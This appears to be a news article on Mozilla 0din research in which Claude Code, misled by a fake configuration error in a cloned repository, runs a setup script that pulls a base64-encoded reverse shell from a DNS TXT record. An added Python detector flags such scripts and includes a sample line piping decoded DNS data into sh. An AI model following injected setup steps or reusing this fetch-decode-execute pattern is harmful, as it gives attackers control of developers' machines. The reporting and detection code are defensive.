- Claude Code executed the dangerous command while treating it as a routine recovery
- A single fake error message triggered the entire chain of hidden attacks
- Static scanners and firewalls saw nothing more than a normal DNS resolution
Researchers on Mozilla’s 0din team have demonstrated how Claude Code can be manipulated to open a hidden reverse shell on a developer’s device.
The exploit did not require malicious code within the cloned project, as every visible file passed a regular check without raising suspicion.
Instead, the dangerous instruction arrived later, obtained at runtime from a DNS text record that no scanner would ever inspect.
How a routine configuration error became an entry point
The attack began with a simple Markdown file that explained how to install a package called Axiom, a common monitoring tool.
Running the tool without initializing it resulted in a simple error message directing the user to run a specific configuration command.
The research team noticed that this pattern closely resembles ordinary developer troubleshooting, which is why it evaded suspicion so effectively.
Claude Code, trying only to be helpful, followed that instruction automatically, treating the documented fix as ordinary, routine error recovery.
That single command triggered a hidden shell script that silently queried a DNS text record completely controlled by the remote attacker.
The record contained a base64-encoded reverse shell command, which was decoded and executed silently, connecting directly to the attacker’s remote server.
Persistence was also possible once inside, as the attacker could drop an SSH key or schedule a hidden cron job.
A single link to a shared repository in a job post or chat message could expose all developers who simply open it.
Common security tools, such as antivirus software or firewall protection, did not detect this flaw, as none of the individual steps seemed suspicious on their own.
Static code scanning tools only recorded a routine DNS lookup, which did not indicate anything malicious in progress.
Network monitoring recorded nothing more than an ordinary domain name resolution, and the agent itself saw the command as a pre-authorized configuration.
0din emphasized that coding agents should inspect exactly which configuration script will actually be executed before running anything.
The team concluded that developers should never assume that an unknown repository is trustworthy, regardless of how common its configuration files appear.
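The inspection 0din recommends can start with a check on the setup script before it runs. The following is an added example, not code from 0din or from Claude Code: a heuristic Python audit that holds a script for human approval when a DNS TXT lookup appears alongside base64 decoding or an interpreter sink. The function name, patterns and sample scripts are assumptions constructed for illustration.

```python
import re

# Heuristic indicator classes. Each is common on its own; the chain the article
# describes needs a DNS TXT lookup plus decoding and/or an interpreter sink.
INDICATORS = {
    "dns_txt": re.compile(r"\b(?:dig|nslookup|host)\b[^\n|;]*\btxt\b", re.I),
    "decode": re.compile(r"\bbase64\s+(?:-d|--decode)\b", re.I),
    "exec_sink": re.compile(r"\|\s*(?:ba|z|da)?sh\b|\beval\b|\b(?:ba)?sh\s+-c\b"),
}


def audit_script(text):
    """Return (verdict, hits) where hits maps indicator -> sorted line numbers."""
    # Fold backslash continuations and blank full-line comments, keeping every
    # character offset unchanged so matches map back to original line numbers.
    flat = text.replace("\\\n", "  ")
    flat = re.sub(r"(?m)^[ \t]*#.*$", lambda m: " " * len(m.group()), flat)
    hits = {}
    for name, pattern in INDICATORS.items():
        lines = {text.count("\n", 0, m.start()) + 1 for m in pattern.finditer(flat)}
        if lines:
            hits[name] = sorted(lines)
    # Hold for human approval when network-supplied TXT data could reach a
    # decoder or an interpreter anywhere in the same script.
    verdict = "hold" if "dns_txt" in hits and len(hits) >= 2 else "pass"
    return verdict, hits


# Constructed samples (not taken from the research); example.invalid never resolves.
SUSPECT = """#!/bin/sh
# init helper
cfg=$(dig +short TXT cfg.example.invalid)
echo "$cfg" | base64 -d | sh
"""
BENIGN = """#!/bin/sh
dig +short A registry.example.invalid
npm install
"""

if __name__ == "__main__":
    for label, script in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(label, *audit_script(script))
```

A `pass` verdict means only that none of these patterns matched; obfuscated or indirect invocations need review of what the script actually executes.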
This case suggests that AI tools based on large language models may need much stronger runtime safeguards.
Until such agents can meaningfully assess what a command is actually executing, it will likely remain difficult to prevent similar indirect attacks.
The broader lesson extends beyond Claude Code, as most agentic AI systems share similar blind spots toward indirect prompt injection.
For now, treating unknown automation as a genuine risk remains the most reliable protection available to most individual developers.